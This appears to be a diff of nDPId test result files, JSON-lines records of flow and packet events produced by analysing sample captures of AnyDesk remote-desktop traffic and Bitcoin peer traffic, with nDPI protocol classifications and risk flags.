00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342199201,"flow_last_seen":1591342199201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1591342199201,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1591342199201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1591342199201,"pkt":"AFBW5dKtAAwplUdeCABFAAA8CJBAAEAGudPAqJWBM1Pu26oPAFApppzyAAAAAKAC+vB4hwAAAgQFtAQCCAqukMx3AAAAAAEDAwc="}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1591342199366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1591342199366,"pkt":"AAwplUdeAFBW5dKtCABFAAAse1UAAIAGRx4zU+7bwKiVgQBQqg9odWR8Kaac82AS+vDm4QAAAgQFtAAA"}
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1591342199366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1591342199366,"pkt":"AFBW5dKtAAwplUdeCABFAAAoCJFAAEAGuebAqJWBM1Pu26oPAFApppzzaHVkfVAQ+vB4cwAA"}
01318{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1591342199201,"flow_last_seen":1591342199366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1591342199366,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01377{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1563,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}}
01580{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2863,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=AnyNet Root CA, O=philandro Software GmbH, C=DE","subjectDN":"C=DE, O=philandro Software GmbH, CN=AnyNet Relay","fingerprint":"9E:08:D2:58:A9:02:CD:4F:E2:4A:26:B8:48:5C:43:0B:81:29:99:E3"}}
00810{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"2":"Match by IP"},"proto":"HTTP.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"http": {}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01201{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6943,"flow_first_seen":1591342199201,"flow_last_seen":1591342255171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2417415,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342198821,"flow_last_seen":1591342198821,"flow_idle_time":7560000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1591342198821,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591342198821,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1591342198821,"pkt":"AFBW5dKtAAwplUdeCABFAABbtopAAEAGCwXAqJWBM1PvkI3\/AFB7i54qMVwSUlAY+DR5WwAAFwMDAC7mz9mv7V5op8uDzrVlyYzGPOa22i4SIRv\/ctzVUMWyqJzhwIdSdK\/Qd7DJrcKc"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591342198821,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1591342198821,"pkt":"AAwplUdeAFBW5dKtCABFAAAoe1AAAIAGRnIzU++QwKiVgQBQjf8xXBJSe4ueXVAQ+vBP7wAAAAAAAAAA"}
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591342198998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1591342198998,"pkt":"AFBW5dKtAAwplUdeCABFAABYtotAAEAGCwfAqJWBM1PvkI3\/AFB7i55dMVwSUlAY+DR5WAAAFwMDACvmz9mv7V5oqHbrZghdQbdzwBFFDzsTJ43BfdwI8acT8HfThIVfMXtYD9Ln"}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591342199201,"flow_last_seen":1591342199201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1591342199201,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1591342199201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1591342199201,"pkt":"AFBW5dKtAAwplUdeCABFAAA8CJBAAEAGudPAqJWBM1Pu26oPAFApppzyAAAAAKAC+vB4hwAAAgQFtAQCCAqukMx3AAAAAAEDAwc="}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1591342199366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1591342199366,"pkt":"AAwplUdeAFBW5dKtCABFAAAse1UAAIAGRx4zU+7bwKiVgQBQqg9odWR8Kaac82AS+vDm4QAAAgQFtAAA"}
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1591342199366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1591342199366,"pkt":"AFBW5dKtAAwplUdeCABFAAAoCJFAAEAGuebAqJWBM1Pu26oPAFApppzzaHVkfVAQ+vB4cwAA"}
01318{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1591342199201,"flow_last_seen":1591342199366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1591342199366,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01377{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1563,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}}
01580{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2863,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=AnyNet Root CA, O=philandro Software GmbH, C=DE","subjectDN":"C=DE, O=philandro Software GmbH, CN=AnyNet Relay","fingerprint":"9E:08:D2:58:A9:02:CD:4F:E2:4A:26:B8:48:5C:43:0B:81:29:99:E3"}}
00810{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"2":"Match by IP"},"proto":"HTTP.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"http": {}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01201{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6943,"flow_first_seen":1591342199201,"flow_last_seen":1591342255171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2417415,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}}
00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","packets-captured":6963,"packets-processed":6963,"total-skipped-flows":0,"total-l4-data-len":2418022,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1591342255171}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 6963/6963

72
test/results/bitcoin.pcap.out
View File

@@ -1,44 +1,44 @@
00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bitcoin.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1301327937725}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1301327937725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937725,"pkt":"ACPrIpS0ACNshovhCABFAACdb3BAAEAGdmXAqAGOvKXVqdgVII1UFpaF9ORId4AY\/\/\/XwQAAAQEICicy22Mwkrss+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABBsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/vKXVqSCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/AqAGOII3ZMDrPGxAeDAD6vQEA"}
00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1301327937800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937800,"pkt":"ACNshovhACPrIpS0CABFAACd8zJAADQG\/qK8pdWpwKgBjiCN2BX05Eh3VBaWhYAYAC7fMwAAAQEICjCSu0gnMttj+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABqsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtgVAQAAAAAAAAAAAAAAAAAAAAAA\/\/+8pdWpII1MLcnArv8XlgAGwwEA"}
01828{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1301327937931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1067,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1067,"pkt_l4_len":1033,"thread_ts_msec":1301327937931,"pkt":"ACPrIpS0ACNshovhCABFAAQdZEVAAEAGfhDAqAGOvKXVqdgVII1UFpbu9ORI4IAY\/\/\/JGQAAAQEICicy22UwkrtL+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZZ2V0YmxvY2tzAAAApQMAAGlfIuqcfAAAHKh7ybVTxuZIQjrl7yTcgS++hNhBt1zq9NegAAAAAAAA0isW7TPLR9+QJv0A5WbZVCvm695mFYsw+RcAAAAAAAAKtKqLikjG018uz8LfLAtdjFIkeP\/i1erq1gAAAAAAAJBdQRxOhTejsSgFAkOe4jLdh+MgkNThEJ18AAAAAAAAuqLvaBfSt3u\/xIqIdA14a1vMRWgufw\/9NSQAAAAAAABmO+ZaHQMV8GVsd2tLL4rFQTc0+9Vfwkt\/KAAAAAAAAJT+LTuh4xfC31zGm\/GrV7uiO60OaIRMkzcNAAAAAAAAuhdRV0aXd6Zg2v\/d1GRW41CXeTNnyZ2lADQAAAAAAADN6C3MlB3uxd0izHdkP3dhS0au0yU7AWAQZwAAAAAAAL+B7POHga71M99A8Eu3CYdV7ruvTTFqTRaEAAAAAAAA3UsnAThWfVMwqZa+fYK\/+mnwaocTsbQIG1kAAAAAAADey3zxujtbDGk\/QTgO92YcU4PswnA6nOZ6FgAAAAAAAMDzxV+Dq1G5LChOJMi\/klliIw7dOCRLUwU1AAAAAAAAPos8A4n6clF7nKE4hFivm22s790lzTk\/xUsAAAAAAAC0sS5A1Mm4fwV3yc3Q1LndsofGdqv023cDhAAAAAAAAGvuGwU2Et\/fX33Zfbvd3fo\/8TaDBcaUcU3CAAAAAAAAP2JWK5H+eMf+Pv\/jSxNvOoqfqtxRlUdLIhEAAAAAAADJveYZh3372qwQQlL9GVXITa9jJ6DXXZhGDQAAAAAAAKMYV6DpTz6VcKhTn2GDUxJn1w6c\/OztngqRAAAAAAAABDCPkjdagfw0FOqHQEeRGYOTGUOY4U7Z+TMAAAAAAABH73UkZZo8i3KUfaLV4BIT5FRuJgLU9+S6PwAAAAAAAEhKQKlsPJI3JIw8Tb+HHwelgYW13heoG+NwAAAAAAAAGoeNNbO0PKw7FoNOsSIzS8W\/U8wXt9nuho8AAAAAAADVlxLK6O44NewFXywS+BNdzYycb7g7WSY\/qQEAAAAAAKqI+qWcSpEbTrldQNWUJik+3hdENRtaz0ynBAAAAAAA\/6kPGMjbu4hU+GZN83C9X6Hc1si6bqd\/l3UhAAAAAABKw0jIrFFXJp9oPx6NizqHl5jwjXfMij2VrHIgAAAAAG\/ijAq28bNywaaiRq5j90+THoNl4VoInGjWGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
